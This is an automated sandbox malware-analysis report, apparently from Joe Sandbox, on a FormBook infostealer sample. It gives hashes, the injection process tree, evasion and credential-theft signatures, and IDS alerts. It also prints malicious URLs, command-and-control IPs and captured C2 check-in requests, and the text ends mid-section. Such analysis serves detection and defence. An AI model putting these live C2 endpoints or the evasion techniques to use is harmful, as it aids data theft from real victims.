
Windows Analysis Report
RO2Y11yOJ7.exe

Overview

General Information

Sample name: RO2Y11yOJ7.exe (renamed because original name is a hash value)
Original sample name: 12e60b3db1e0cb33c5e66d0c114b8fa1033984e21f3741e97111f41b37a04978.exe
Analysis ID: 1551211
MD5: 5ffe1ba845fb6e48aae4367ef675444e
SHA1: b45e53f7bc9b7b2805c1bcd62c35f1554ecdc542
SHA256: 12e60b3db1e0cb33c5e66d0c114b8fa1033984e21f3741e97111f41b37a04978
Tags: exe, user-adrian__luca

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Found direct / indirect Syscall (likely to bypass EDR)
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • RO2Y11yOJ7.exe (PID: 7928 cmdline: "C:\Users\user\Desktop\RO2Y11yOJ7.exe" MD5: 5FFE1BA845FB6E48AAE4367EF675444E)
    • svchost.exe (PID: 7992 cmdline: "C:\Users\user\Desktop\RO2Y11yOJ7.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • avRLXQyosx.exe (PID: 7148 cmdline: "C:\Program Files (x86)\KJyPoNHseUIsGMbuwejDQZOKlxCchvdjFeaFGBIvDseKbKAXosLmCyzHBXJZRfvRdvnJXv\avRLXQyosx.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • Atuserer.exe (PID: 6956 cmdline: "C:\Windows\SysWOW64\Atuserer.exe" MD5: D5B61959A509BDA85300781F5A829610)
          • avRLXQyosx.exe (PID: 6584 cmdline: "C:\Program Files (x86)\KJyPoNHseUIsGMbuwejDQZOKlxCchvdjFeaFGBIvDseKbKAXosLmCyzHBXJZRfvRdvnJXv\avRLXQyosx.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 7428 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
00000007.00000002.3153276903.0000000000820000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000004.00000002.1675780203.0000000002E90000.00000040.10000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000004.00000002.1675422438.00000000004C0000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000007.00000002.3163418586.0000000000E90000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000008.00000002.3166059888.0000000005440000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |

Source | Rule | Description | Author | Strings
4.2.svchost.exe.4c0000.0.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
4.2.svchost.exe.4c0000.0.raw.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |

System Summary

Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Users\user\Desktop\RO2Y11yOJ7.exe", CommandLine: "C:\Users\user\Desktop\RO2Y11yOJ7.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\RO2Y11yOJ7.exe", ParentImage: C:\Users\user\Desktop\RO2Y11yOJ7.exe, ParentProcessId: 7928, ParentProcessName: RO2Y11yOJ7.exe, ProcessCommandLine: "C:\Users\user\Desktop\RO2Y11yOJ7.exe", ProcessId: 7992, ProcessName: svchost.exe
Source: Process started | Author: vburov | Data: Command: "C:\Users\user\Desktop\RO2Y11yOJ7.exe", CommandLine: "C:\Users\user\Desktop\RO2Y11yOJ7.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\RO2Y11yOJ7.exe", ParentImage: C:\Users\user\Desktop\RO2Y11yOJ7.exe, ParentProcessId: 7928, ParentProcessName: RO2Y11yOJ7.exe, ProcessCommandLine: "C:\Users\user\Desktop\RO2Y11yOJ7.exe", ProcessId: 7992, ProcessName: svchost.exe
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-11-07T15:49:40.688943+0100 | 2022930 | 1 | A Network Trojan was detected | 52.149.20.212 | 443 | 192.168.2.10 | 49764 | TCP
2024-11-07T15:50:19.138094+0100 | 2022930 | 1 | A Network Trojan was detected | 20.109.210.53 | 443 | 192.168.2.10 | 49972 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-11-07T15:50:22.133740+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.10 | 49973 | 3.33.130.190 | 80 | TCP
2024-11-07T15:50:46.527094+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.10 | 49977 | 192.64.118.221 | 80 | TCP
2024-11-07T15:51:01.318763+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.10 | 49981 | 195.154.200.15 | 80 | TCP
2024-11-07T15:51:15.803730+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.10 | 49985 | 168.76.221.252 | 80 | TCP
2024-11-07T15:51:30.408170+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.10 | 49989 | 150.95.254.16 | 80 | TCP
2024-11-07T15:51:44.728604+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.10 | 49993 | 188.114.96.3 | 80 | TCP
2024-11-07T15:51:58.510867+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.10 | 49997 | 103.249.106.91 | 80 | TCP
2024-11-07T15:52:12.410015+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.10 | 50001 | 172.67.202.10 | 80 | TCP
2024-11-07T15:52:27.157159+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.10 | 50005 | 156.234.28.94 | 80 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-11-07T15:50:38.685584+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.10 | 49974 | 192.64.118.221 | 80 | TCP
2024-11-07T15:50:41.368303+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.10 | 49975 | 192.64.118.221 | 80 | TCP
2024-11-07T15:50:43.915878+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.10 | 49976 | 192.64.118.221 | 80 | TCP
2024-11-07T15:50:53.605281+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.10 | 49978 | 195.154.200.15 | 80 | TCP
2024-11-07T15:50:56.152178+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.10 | 49979 | 195.154.200.15 | 80 | TCP
2024-11-07T15:50:58.699230+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.10 | 49980 | 195.154.200.15 | 80 | TCP
2024-11-07T15:51:08.087996+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.10 | 49982 | 168.76.221.252 | 80 | TCP
2024-11-07T15:51:10.730228+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.10 | 49983 | 168.76.221.252 | 80 | TCP
2024-11-07T15:51:13.264976+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.10 | 49984 | 168.76.221.252 | 80 | TCP
2024-11-07T15:51:22.206440+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.10 | 49986 | 150.95.254.16 | 80 | TCP
2024-11-07T15:51:25.339847+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.10 | 49987 | 150.95.254.16 | 80 | TCP
2024-11-07T15:51:27.862211+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.10 | 49988 | 150.95.254.16 | 80 | TCP
2024-11-07T15:51:36.985157+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.10 | 49990 | 188.114.96.3 | 80 | TCP
2024-11-07T15:51:39.476121+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.10 | 49991 | 188.114.96.3 | 80 | TCP
2024-11-07T15:51:42.025674+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.10 | 49992 | 188.114.96.3 | 80 | TCP
2024-11-07T15:51:51.011005+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.10 | 49994 | 103.249.106.91 | 80 | TCP
2024-11-07T15:51:53.901727+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.10 | 49995 | 103.249.106.91 | 80 | TCP
2024-11-07T15:51:55.979857+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.10 | 49996 | 103.249.106.91 | 80 | TCP
2024-11-07T15:52:04.770948+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.10 | 49998 | 172.67.202.10 | 80 | TCP
2024-11-07T15:52:07.365670+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.10 | 49999 | 172.67.202.10 | 80 | TCP
2024-11-07T15:52:09.870607+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.10 | 50000 | 172.67.202.10 | 80 | TCP
2024-11-07T15:52:19.727445+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.10 | 50002 | 156.234.28.94 | 80 | TCP
2024-11-07T15:52:22.121733+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.10 | 50003 | 156.234.28.94 | 80 | TCP
2024-11-07T15:52:24.713799+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.10 | 50004 | 156.234.28.94 | 80 | TCP

AV Detection

Source: http://www.7153115.xyz/dblf/ | Avira URL Cloud: Label: malware
Source: http://www.7153115.xyz/dblf/?eL-x=xA4m52UOO3AWG6dLOPkkJ91gfa/sOtMUS9WQ9/7Ili2Upd70ADnAJWaIHnvs9U+whG/nDh7qG8iCbCHdOukQeWX5e+ZPWvcCIT2YOJAlrSuLiE5N6g==&wFVH=-zwTKPF0iPth | Avira URL Cloud: Label: malware
Source: https://00808.vip/ | Avira URL Cloud: Label: malware
Source: RO2Y11yOJ7.exe | ReversingLabs: Detection: 68%
Source: Yara match | File source: 4.2.svchost.exe.4c0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.2.svchost.exe.4c0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000007.00000002.3153276903.0000000000820000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.1675780203.0000000002E90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.1675422438.00000000004C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.3163418586.0000000000E90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.3166059888.0000000005440000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.1676172842.0000000003350000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.3158152521.0000000000B30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.3163670686.00000000023F0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: RO2Y11yOJ7.exe | Joe Sandbox ML: detected
Source: RO2Y11yOJ7.exe | Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb | source: avRLXQyosx.exe, 00000006.00000002.3160751775.000000000094E000.00000002.00000001.01000000.00000005.sdmp, avRLXQyosx.exe, 00000008.00000000.1743911480.000000000094E000.00000002.00000001.01000000.00000005.sdmp
Source: Binary string: ATuserer.pdb | source: svchost.exe, 00000004.00000003.1643151077.000000000282B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000004.00000003.1643067119.000000000281B000.00000004.00000020.00020000.00000000.sdmp, avRLXQyosx.exe, 00000006.00000002.3158765250.00000000006A8000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wntdll.pdbUGP | source: RO2Y11yOJ7.exe, 00000002.00000003.1294048871.0000000004080000.00000004.00001000.00020000.00000000.sdmp, RO2Y11yOJ7.exe, 00000002.00000003.1303559485.0000000004270000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.1675823650.000000000309E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.1675823650.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000004.00000003.1571063757.0000000002B00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000004.00000003.1572919934.0000000002D00000.00000004.00000020.00020000.00000000.sdmp, Atuserer.exe, 00000007.00000002.3164055528.0000000004A1E000.00000040.00001000.00020000.00000000.sdmp, Atuserer.exe, 00000007.00000002.3164055528.0000000004880000.00000040.00001000.00020000.00000000.sdmp, Atuserer.exe, 00000007.00000003.1677617777.00000000046D6000.00000004.00000020.00020000.00000000.sdmp, Atuserer.exe, 00000007.00000003.1675363107.00000000044E2000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb | source: RO2Y11yOJ7.exe, 00000002.00000003.1294048871.0000000004080000.00000004.00001000.00020000.00000000.sdmp, RO2Y11yOJ7.exe, 00000002.00000003.1303559485.0000000004270000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000004.00000002.1675823650.000000000309E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.1675823650.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000004.00000003.1571063757.0000000002B00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000004.00000003.1572919934.0000000002D00000.00000004.00000020.00020000.00000000.sdmp, Atuserer.exe, Atuserer.exe, 00000007.00000002.3164055528.0000000004A1E000.00000040.00001000.00020000.00000000.sdmp, Atuserer.exe, 00000007.00000002.3164055528.0000000004880000.00000040.00001000.00020000.00000000.sdmp, Atuserer.exe, 00000007.00000003.1677617777.00000000046D6000.00000004.00000020.00020000.00000000.sdmp, Atuserer.exe, 00000007.00000003.1675363107.00000000044E2000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: svchost.pdb | source: Atuserer.exe, 00000007.00000002.3158332138.0000000000BAA000.00000004.00000020.00020000.00000000.sdmp, Atuserer.exe, 00000007.00000002.3165412212.0000000004EAC000.00000004.10000000.00040000.00000000.sdmp, avRLXQyosx.exe, 00000008.00000000.1744457966.000000000300C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.2018937107.0000000031E2C000.00000004.80000000.00040000.00000000.sdmp
Source: Binary string: ATuserer.pdbGCTL | source: svchost.exe, 00000004.00000003.1643151077.000000000282B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000004.00000003.1643067119.000000000281B000.00000004.00000020.00020000.00000000.sdmp, avRLXQyosx.exe, 00000006.00000002.3158765250.00000000006A8000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: svchost.pdbUGP | source: Atuserer.exe, 00000007.00000002.3158332138.0000000000BAA000.00000004.00000020.00020000.00000000.sdmp, Atuserer.exe, 00000007.00000002.3165412212.0000000004EAC000.00000004.10000000.00040000.00000000.sdmp, avRLXQyosx.exe, 00000008.00000000.1744457966.000000000300C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.2018937107.0000000031E2C000.00000004.80000000.00040000.00000000.sdmp
Source: C:\Users\user\Desktop\RO2Y11yOJ7.exe | Code function: 2_2_003A449B GetFileAttributesW,FindFirstFileW,FindClose | 2_2_003A449B
Source: C:\Users\user\Desktop\RO2Y11yOJ7.exe | Code function: 2_2_003AC75D FindFirstFileW,FindClose | 2_2_003AC75D
Source: C:\Users\user\Desktop\RO2Y11yOJ7.exe | Code function: 2_2_003AC7E8 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf | 2_2_003AC7E8
Source: C:\Users\user\Desktop\RO2Y11yOJ7.exe | Code function: 2_2_003AF021 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose | 2_2_003AF021
Source: C:\Users\user\Desktop\RO2Y11yOJ7.exe | Code function: 2_2_003AF17E SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose | 2_2_003AF17E
Source: C:\Users\user\Desktop\RO2Y11yOJ7.exe | Code function: 2_2_003AF47F FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose | 2_2_003AF47F
Source: C:\Users\user\Desktop\RO2Y11yOJ7.exe | Code function: 2_2_003A3833 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose | 2_2_003A3833
Source: C:\Users\user\Desktop\RO2Y11yOJ7.exe | Code function: 2_2_003A3B56 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose | 2_2_003A3B56
Source: C:\Users\user\Desktop\RO2Y11yOJ7.exe | Code function: 2_2_003ABD48 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose | 2_2_003ABD48
Source: C:\Windows\SysWOW64\Atuserer.exe | Code function: 7_2_0083C4F0 FindFirstFileW,FindNextFileW,FindClose | 7_2_0083C4F0
Source: C:\Windows\SysWOW64\Atuserer.exe | Code function: 4x nop then xor eax, eax | 7_2_00829DD0
Source: C:\Windows\SysWOW64\Atuserer.exe | Code function: 4x nop then pop edi | 7_2_0082E1C9
Source: C:\Windows\SysWOW64\Atuserer.exe | Code function: 4x nop then mov ebx, 00000004h | 7_2_046D04E8

Networking

Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.10:49973 -> 3.33.130.190:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49978 -> 195.154.200.15:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49991 -> 188.114.96.3:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49987 -> 150.95.254.16:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49994 -> 103.249.106.91:80
Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.10:49997 -> 103.249.106.91:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49976 -> 192.64.118.221:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49979 -> 195.154.200.15:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49982 -> 168.76.221.252:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49986 -> 150.95.254.16:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49974 -> 192.64.118.221:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:50000 -> 172.67.202.10:80
Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.10:49989 -> 150.95.254.16:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49996 -> 103.249.106.91:80
Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.10:49981 -> 195.154.200.15:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49998 -> 172.67.202.10:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:50003 -> 156.234.28.94:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:50004 -> 156.234.28.94:80
Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.10:50005 -> 156.234.28.94:80
Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.10:49977 -> 192.64.118.221:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49995 -> 103.249.106.91:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49988 -> 150.95.254.16:80
Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.10:50001 -> 172.67.202.10:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49983 -> 168.76.221.252:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49984 -> 168.76.221.252:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49990 -> 188.114.96.3:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49975 -> 192.64.118.221:80
Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.10:49985 -> 168.76.221.252:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49992 -> 188.114.96.3:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49999 -> 172.67.202.10:80
Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.10:49993 -> 188.114.96.3:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:50002 -> 156.234.28.94:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49980 -> 195.154.200.15:80
Source: DNS query: www.7153115.xyz
Source: Joe Sandbox View | IP Address: 188.114.96.3 188.114.96.3
Source: Joe Sandbox View | IP Address: 188.114.96.3 188.114.96.3
Source: Joe Sandbox View | ASN Name: NAMECHEAP-NETUS NAMECHEAP-NETUS
Source: Joe Sandbox View | ASN Name: ULTRANETSERVICOSEMINTERNETLTDABR ULTRANETSERVICOSEMINTERNETLTDABR
Source: Joe Sandbox View | ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Network traffic | Suricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 52.149.20.212:443 -> 192.168.2.10:49764
Source: Network traffic | Suricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 20.109.210.53:443 -> 192.168.2.10:49972
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Users\user\Desktop\RO2Y11yOJ7.exe | Code function: 2_2_003B2404 InternetReadFile,InternetQueryDataAvailable,InternetReadFile | 2_2_003B2404
Source: global traffic | HTTP traffic detected:
  GET /ugdo/?eL-x=kxJ3od325Xqo8wxQ1hBgR6SDm2DyJ3wteCEI/DiGOvMuHKXdFQvV7KpJf8xNWNcGdoq0hBwRfp4PtcpQcJYcqVm6hUSlzi3DLiLBqaXQmTBihn830w==&wFVH=-zwTKPF0iPth HTTP/1.1
  Host: www.lexjetcenter.net
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
  Accept-Language: en-US,en;q=0.9
  Connection: close
  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.56 Safari/536.5
Source: global traffic | HTTP traffic detected:
  GET /favd/?wFVH=-zwTKPF0iPth&eL-x=WtgtBzW4FsxMnQSuWOIYSeEoiXDfOi+mEu8byEiY5V0Es9uEUQhozXoYk37/fSn7c76G5+FTj9P/4AI0dbo7dAuFWhjyFRNqxijvASv2x9K31F87tg== HTTP/1.1
  Host: www.elarac.top
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
  Accept-Language: en-US,en;q=0.9
  Connection: close
  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.56 Safari/536.5
Source: global traffic | HTTP traffic detected:
